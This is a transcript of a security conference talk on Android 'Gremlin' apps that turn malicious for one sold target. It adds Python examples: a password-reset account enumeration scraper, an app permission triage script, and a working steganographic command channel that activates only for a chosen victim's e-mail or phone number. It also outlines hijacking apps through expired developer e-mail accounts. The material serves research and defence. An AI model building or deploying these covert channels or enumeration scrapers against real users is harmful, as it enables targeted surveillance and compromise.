Gremlin Apps & Gremlin Botnets by Chema Alonso

Talk delivered by Chema Alonso ( https://MyPublicInbox.com/ChemaAlonso ) in Hack in the Box CyberWeek 2021 about Gremlin Apps & Gremlin Botnets. You can see the talk at: https://www.youtube.com/watch?v=yQJ5sFtOysM

1. Gremlin Apps & Gremlin Botnets, Chema Alonso (https://MyPublicInbox.com/ChemaAlonso)
2. Long time ago: “FOCA is a Botnet” (https://www.elladodelmal.com/2010/12/la-foca-es-una-botnet.html)
3. FOCA botnet (diagram): the Command & Control server publishes an image carrying a steganographic payload (IP + command); the Gremlin FOCA client fetches it (GET IMG) and replies with its ANSWER.
4. Steganography as C&C: detection is complex = steganalysis (dynamic app analysis) + reversing (static code analysis)
5. Gremlin Apps: Cut Rope Christmas
6. Gremlin Apps: Cut Rope Christmas. A goodware app until one event triggers the transformation: data extracted, installed on a specific computer (Stuxnet), automatic app update, app stolen, app sold/bought, company, “business strategy”.
7. Gremlin Apps: Pixel Battery Saver (from Battery Saver to Rogue AV)
• 50,000 active users
• The right permissions
• Cheap!
• The business case works
https://www.elladodelmal.com/2015/01/la-venta-de-apps-al-cibercrimen.html
8. Tacyt: Big Data & “Data in Motion” to watch cybercrime in apps
10. Data streams for “dorks” like “Google hacking”
11. Business model: APT provider with a Gremlin Botnet of apps that become malicious for only one target. We sell targets, not malware.
• Create a Gremlin Botnet with lots of apps to learn who you are and sell you as a target for an APT:
  • What company you work for.
  • Who you are in social networks.
  • Sell you for extortion, data leakage, CEO attacks, as part of a bigger APT, etc.
• Who you are on the device the Gremlin app is installed on:
  • Accounts: Twitter, Facebook, etc.
  • Phone number: WhatsApp, Telegram, 2FA, account recovery.
  • E-mail: login.
  • A little OSINT on the Internet.
  • Dirty Business Card.
• Turn a Gremlin App malicious only for the target we sell:
  • Only one app becomes malicious.
  • Steganography to connect to the C&C.
  • Opportunistic use of permissions (install-time & runtime).
12. Tacyt: Android apps (install-time & runtime) permissions
13. Permissions to get the phone number:
<uses-permission android:name="android.permission.READ_PHONE_STATE"/>
<uses-permission android:name="android.permission.READ_PHONE_NUMBERS"/>
14. Permissions to get the phone number & accounts
• TelephonyManager to access the phone number stored in the SIM
• AccountManager to get info on the accounts (Twitter, Telegram, Google…)
• Some of them expose:
  • E-mail
  • Phone number
15. Outdated (2018): fragmentation and update of Android devices
Version        Codename            API  Distribution (%)
2.3.3-2.3.7    Gingerbread         10   0.3
4.0.3-4.0.4    Ice Cream Sandwich  15   0.3
4.1.x          Jelly Bean          16   1.2
4.2.x          Jelly Bean          17   1.5
4.3            Jelly Bean          18   0.5
4.4            KitKat              19   6.9
5.0            Lollipop            21   3.0
5.1            Lollipop            22   11.5
6.0            Marshmallow         23   16.9
7.0            Nougat              24   11.4
7.1            Nougat              25   7.8
8.0            Oreo                26   12.9
8.1            Oreo                27   15.4
9              Pie                 28   10.4
Total affected (< 8.0): 61.3 %
In 2018 (when this PoC was done) almost 62% of devices ran a version below Android 8 and allowed access to the accounts (e-mail, Twitter…). In 2021 (one week ago) approximately 50% of devices are still on Android 9 or lower.
16. No account permissions? OAuth login
• An OAuth login could be more dangerous
• OAuth: e-mail, data, and you can change the “scope” for one device and get everything
17. Dirty Business Card
18. Data leakage & web scraping (weaponizing leaks)
1. Reset the password for this e-mail
2. Error: the user does not exist
3. Error: the user does exist
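
The enumeration oracle of slide 18 and its fix, as an added example (not code from the talk): a leaked e-mail list is replayed against the reset form, and the two different answers tell the scraper which addresses belong to real users. The user store, both handlers and the "leaked" candidate list are constructed for illustration.

```python
"""Password-reset account enumeration: the oracle on slide 18 and its fix.

Added example; not code from the talk. The user store, both handlers and
the 'leaked' candidate list are constructed for illustration.
"""

# Constructed user database standing in for the site's real one.
REGISTERED = {"alice@example.com", "bob@example.com"}

# Constructed breach dump: the 'leak' that gets weaponized against the site.
LEAKED_EMAILS = [
    "alice@example.com",
    "carol@example.com",
    "bob@example.com",
    "dave@example.com",
]


def _enqueue_reset_mail(email):
    """Stand-in for a background mail job; intentionally a no-op here."""


def reset_password_vulnerable(email):
    """Slide 18 as code: one answer when the address is unknown, another
    when it is registered ('the user does exist'), so the reset form
    doubles as an existence oracle."""
    if email not in REGISTERED:
        return {"status": 404, "message": "Error: the user does not exist"}
    _enqueue_reset_mail(email)
    return {"status": 200, "message": "Reset link sent to this address"}


def reset_password_hardened(email):
    """Identical status and body whether or not the address is registered.
    The mail is queued rather than sent inline, so the caller also cannot
    measure the SMTP round trip as a timing difference."""
    if email in REGISTERED:
        _enqueue_reset_mail(email)
    return {"status": 200,
            "message": "If that address is registered, a reset link was sent"}


def bucket_responses(handler, candidates):
    """What the scraper does: submit every candidate and group the
    addresses by the (status, message) pair that came back. More than
    one bucket means the endpoint leaks, and the buckets *are* the
    enumeration result."""
    buckets = {}
    for email in candidates:
        r = handler(email)
        buckets.setdefault((r["status"], r["message"]), set()).add(email)
    return buckets


def is_enumeration_oracle(handler, candidates):
    """True when the endpoint's answers split the candidates into groups."""
    return len(bucket_responses(handler, candidates)) > 1


if __name__ == "__main__":
    for name, handler in (("vulnerable", reset_password_vulnerable),
                          ("hardened", reset_password_hardened)):
        print(name, bucket_responses(handler, LEAKED_EMAILS))
```

The same bucketing works against a live site when `handler` is replaced by an HTTP request; anything that varies between the two branches (status code, body length, redirect target, response time) becomes a bucket key.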
19. Gremlin Botnet: buying the right app
permissionName:"android.permission.GET_ACCOUNTS"
permissionName:"android.permission.INTERNET"
permissionName:"android.permission.READ_EXTERNAL_STORAGE"
permissionName:"android.permission.READ_PHONE_STATE"
permissionName:"android.permission.ACCESS_NETWORK_STATE"
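
An added example (not code from the talk or from Tacyt) that applies the permission criteria of slides 13, 14 and 19 to a single app's AndroidManifest.xml instead of to the Tacyt index: it lists the declared permissions, reports whether the full set the slide 19 query asks for is present, and whether the phone-number permissions of slide 13 are declared. Both manifests and their package names are constructed.

```python
"""Triage an AndroidManifest.xml for the permission set bought on slide 19.

Added example, not from the talk or from Tacyt. Both manifests below are
constructed and the package names are hypothetical.
"""
import xml.etree.ElementTree as ET

# Manifest attributes live in the android namespace; ElementTree exposes
# them under the '{uri}local' key, so looking up 'android:name' finds nothing.
ANDROID_NS = "http://schemas.android.com/apk/res/android"
NAME_ATTR = "{%s}name" % ANDROID_NS

# The Tacyt query on slide 19, as a set of permission names.
GREMLIN_SET = {
    "android.permission.GET_ACCOUNTS",
    "android.permission.INTERNET",
    "android.permission.READ_EXTERNAL_STORAGE",
    "android.permission.READ_PHONE_STATE",
    "android.permission.ACCESS_NETWORK_STATE",
}
# Slide 13: what is needed to read the phone number.
PHONE_NUMBER_SET = {
    "android.permission.READ_PHONE_STATE",
    "android.permission.READ_PHONE_NUMBERS",
}


def declared_permissions(manifest_xml):
    """Every <uses-permission> / <uses-permission-sdk-23> name in the manifest."""
    root = ET.fromstring(manifest_xml)
    names = set()
    for tag in ("uses-permission", "uses-permission-sdk-23"):
        for el in root.iter(tag):
            name = el.get(NAME_ATTR)
            if name:
                names.add(name)
    return names


def triage(manifest_xml):
    """Compare the declared permissions with the slide 19 shopping list."""
    perms = declared_permissions(manifest_xml)
    matched = perms & GREMLIN_SET
    return {
        "package": ET.fromstring(manifest_xml).get("package"),
        "gremlin_matched": sorted(matched),
        "gremlin_missing": sorted(GREMLIN_SET - perms),
        "full_gremlin_set": matched == GREMLIN_SET,
        "can_read_phone_number": bool(perms & PHONE_NUMBER_SET),
    }


# Constructed manifest: a photo-filter app that declares the whole set.
PHOTO_APP_MANIFEST = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.beautyfilter">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.GET_ACCOUNTS"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.READ_PHONE_NUMBERS"/>
    <application android:label="Beauty Filter"/>
</manifest>
"""

# Constructed manifest: an ad-supported game that only needs the network.
QUIZ_GAME_MANIFEST = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.quizgame">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <application android:label="What Do You Prefer?"/>
</manifest>
"""

if __name__ == "__main__":
    for m in (PHOTO_APP_MANIFEST, QUIZ_GAME_MANIFEST):
        print(triage(m))
```

Run it over the manifest pulled out of an APK (aapt dump or apktool give the decoded XML) when vetting an app a company is about to buy or sideload; a full match is not proof of anything, but it is exactly the profile the slide says a buyer is looking for.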
20. Gremlin Botnet: looking for the perfect target
21. mASAPP: controls apps for sale!
22. Gremlin Botnet: opportunistic permission usage
• Nobody suspects a permission if they can explain it
• “Yeah… it is because this is an app for enhancing photos with beauty effects”
• Use permissions opportunistically
• Ex: Pokémon Go & photo pictures
• Ex: select a photo and take them all
• Compiler / library infections?
• Ex: XcodeGhost
• Build your own app and “be malicious” when the permission you need is in use
23. Quiz App: PoC for our Gremlin Botnet
• Quiz App is a PoC.
• Quiz App is a “What do you prefer?” game.
• It is working goodware on all devices until one target is activated.
• It uses steganography to exchange commands and data with the C&C.
24. Quiz App: PoC for our Gremlin Botnet. In our PoC an e-mail, phone number or Twitter account activates the Gremlin App.
25. Quiz App: PoC for our Gremlin Botnet. The (ad) banner is, in our case, the activation channel.
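
The activation channel of slides 23 to 25, and the steganographic C&C of slides 3 and 4, as an added example; this is not the Quiz App's code. A target selector plus a command are hidden in the least-significant bit of the banner's pixel bytes (the banner here is a constructed byte string; a real app would first decode the image), and the client only returns the command when one of its own identifiers (slide 24: e-mail, phone number, Twitter handle) matches the selector, so every other installation keeps behaving as goodware. The frame layout, the SHA-256 selector and the identifiers are assumptions.

```python
"""Steganographic C&C with per-target activation (slides 3, 4, 23-25).

Added example; not the Quiz App's code. The banner is a constructed byte
string standing in for decoded pixel bytes, and the frame layout
(MAGIC + length + selector + command) and the identifiers are hypothetical.
"""
import hashlib

MAGIC = b"GB"                        # marks a banner that carries a frame
SELECTOR_LEN = 8                     # bytes of SHA-256 used to pick the target
HEADER_BITS = (len(MAGIC) + 2) * 8   # MAGIC plus a 2-byte payload length


def _selector(identifier):
    """Opaque target selector: the C&C never ships the raw e-mail or number."""
    return hashlib.sha256(identifier.strip().lower().encode()).digest()[:SELECTOR_LEN]


def embed(carrier, payload):
    """Write MAGIC + length + payload into the LSB of one carrier byte per bit."""
    frame = MAGIC + len(payload).to_bytes(2, "big") + payload
    if len(frame) * 8 > len(carrier):
        raise ValueError("carrier too small for payload")
    out = bytearray(carrier)
    i = 0
    for byte in frame:
        for shift in range(7, -1, -1):          # MSB first
            out[i] = (out[i] & 0xFE) | ((byte >> shift) & 1)
            i += 1
    return bytes(out)


def _read(carrier, start_bit, n_bytes):
    """Reassemble n_bytes from the LSBs starting at carrier index start_bit."""
    vals = bytearray()
    for k in range(n_bytes):
        v = 0
        for b in range(8):
            v = (v << 1) | (carrier[start_bit + k * 8 + b] & 1)
        vals.append(v)
    return bytes(vals)


def extract(carrier):
    """Hidden payload, or None when the banner carries no frame."""
    if len(carrier) < HEADER_BITS or _read(carrier, 0, len(MAGIC)) != MAGIC:
        return None
    length = int.from_bytes(_read(carrier, len(MAGIC) * 8, 2), "big")
    if HEADER_BITS + length * 8 > len(carrier):
        return None
    return _read(carrier, HEADER_BITS, length)


def build_activation_banner(carrier, target_identifier, command):
    """C&C side: sell one target by naming it in the next banner."""
    return embed(carrier, _selector(target_identifier) + command.encode())


def client_poll(banner, my_identifiers):
    """App side, on every ad refresh: the command if this device is the
    sold target, otherwise None and the app stays a quiz game."""
    payload = extract(banner)
    if payload is None or len(payload) <= SELECTOR_LEN:
        return None
    selector, command = payload[:SELECTOR_LEN], payload[SELECTOR_LEN:]
    if selector not in {_selector(i) for i in my_identifiers}:
        return None
    return command.decode()


# Constructed carrier: a 2,000-byte synthetic gradient standing in for pixels.
CLEAN_BANNER = bytes((i * 37 + 11) % 256 for i in range(2000))

if __name__ == "__main__":
    banner = build_activation_banner(CLEAN_BANNER, "alice@example.com", "activate")
    print(client_poll(banner, ["alice@example.com", "+34600000000", "@alice"]))
    print(client_poll(banner, ["bob@example.com", "+34611111111", "@bob"]))
    print(client_poll(CLEAN_BANNER, ["alice@example.com"]))
```

Only one bit per byte changes, which is why slide 4 pairs steganalysis with reversing: comparing the LSB plane of successive banner versions shows that something is being written there, but only the decompiled client reveals the frame layout and the fact that the selector is a hash of the device owner's identifiers.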
26. Gremlin App in Gremlin Botnet
27. Quiz App: Gremlin Botnet C&C. Sell the target
28. Gremlin Botnet C&C
29. “Stealing” apps with Data in Motion
• What happens when a developer “dies”?
• When are apps outdated?
• Can you re-register developer accounts?
• Can you steal an app?
Provider                            Expiration policy (2018)
Gmail                               9 months*
AOL Mail                            3 months
FastMail                            End of payment
GMX Mail                            6 months or end of payment
Hushmail                            3 weeks or end of payment
iCloud                              Never
Lycos                               1 month
Mail.com                            6 months or end of payment
Mail.ru                             6 months or end of payment
Mailfence                           7 months (free) or never (paid)
Outlook.com (Live Mail/Hotmail)     270 days
ProtonMail                          3 months
Rackspace                           End of payment
Rediffmail                          3 months
Runbox                              End of payment
Tutanota                            Never
Yahoo!                              12 months
Yandex Mail                         24 months
Zoho                                4 months or end of payment
30. Tacyt: orphan “apps” without developers
• Study of apps whose developer accounts are outdated and free.
• Re-register them and take control of the Google developer account.
• How many installations are affected?
• We selected Outlook and a sample of 217 e-mail accounts from old apps.
Result (chart, Outlook): 209 accounts not expired, 8 accounts expired.
31. “Dead Poets Society”
E-mail account / # apps / app names / # downloads
• XXXXXcolla@outlook.com, 12 apps, 1,256,150 downloads: 1. Insta Mirror, 2. Insta Face, 3. Insta Eyes, 4. Face Blender, 5. Insta Effects, 6. Insta Collage, 7. Insta Color, 8. Animal Face, 9. Insta Frames, 10. Photo Shape for Instagram, 11. Insta Camera, 12. Insta Square
• XXXXXXloperapps@outlook.com, 1 app, 1,000,000 downloads: 1. Download Video Downloader Free
• XXXXXenes@outlook.com, 1 app, 1,000,000 downloads: 1. Imágenes para Whatsapp
• XXXXXXnloader@outlook.com, 1 app, 500,000 downloads: 1. IDM+ Download Manager free
• XXXXXtudios@outlook.com, 1 app, 500,000 downloads: 1. Super Artie World
• XXXXXkit4u@outlook.com, 12 apps, 346,200 downloads: 2. Military Armor Mod Installer, 3. Poke Cube Mod Installer, 4. Elsa Mod Installer, 5. RhanCandia Elevator Installer, 6. Instant Structure Mod Installer, 7. Better Lucky Blocks Installer, 8. AutomatedCraft Mod Installer, 9. Christmas Bosses Mod Installer, 10. MineKart Mod Installer, 11. Security Camera Mod Installer, 12. Morph Victim Mod Installer
• XXXXXX.sp@outlook.com, 1 app, 100,000 downloads: 1. Video player for android
• XXXXXX.rocha@outlook.com, 6 apps, 152,000 downloads: 1. Quiz Millonario Español Gratis, 2. Millionaire, 3. Millionaire Quiz English, 4. Quiz Milionario Italiano, 5. Millionnaire Quiz Français
8 accounts = 4,854,350 downloads
33. Bring Your Own Device vs Take Your Own Device
• BYOD
  • The user has a personal account with Google or Apple.
  • The user owns the device.
  • Installs corporate apps IF they agree to that.
  • When the employer/employee relationship ends, the user manages the device to restore it as it was before.
• TYOD (not an SMDM)
  • The user has a personal account with Google or Apple.
  • The company owns the device.
  • The user is “forced” to install apps.
  • When the employer/employee relationship ends… who manages the device?
34. Corporate Gremlin Botnet & BYOD
• Corporate & event apps
• Sideloading & TestFlight (no App Store)
• No audit / no open source
• Opportunistic usage of permissions
• BYOD: your own device
  • Your own photos
  • Your own contacts
  • Your own messages
• TYOD or corporate device
  • Apple contract / Google contract?
35. Corporate Gremlin Botnet in BYOD & TYOD
36. Thanks!
• Every installed app (even your company's) can do on your device everything its permissions allow it to do; therefore, always think the worst.
• Trust is not enough -> Zero Trust.
• Security for top executives means controlling the security of every single app installed on their professional devices and teaching them to do the same on their personal ones.
• Any app can eventually become a Gremlin App just because of:
  • An evil developer
  • A bug in its code
  • The app is sold
  • The app is stolen
Contact Chema Alonso at MyPublicInbox.com: https://MyPublicInbox.com/ChemaAlonso
“Dad, mum… can I play a free game on your device that my friends play? No.”
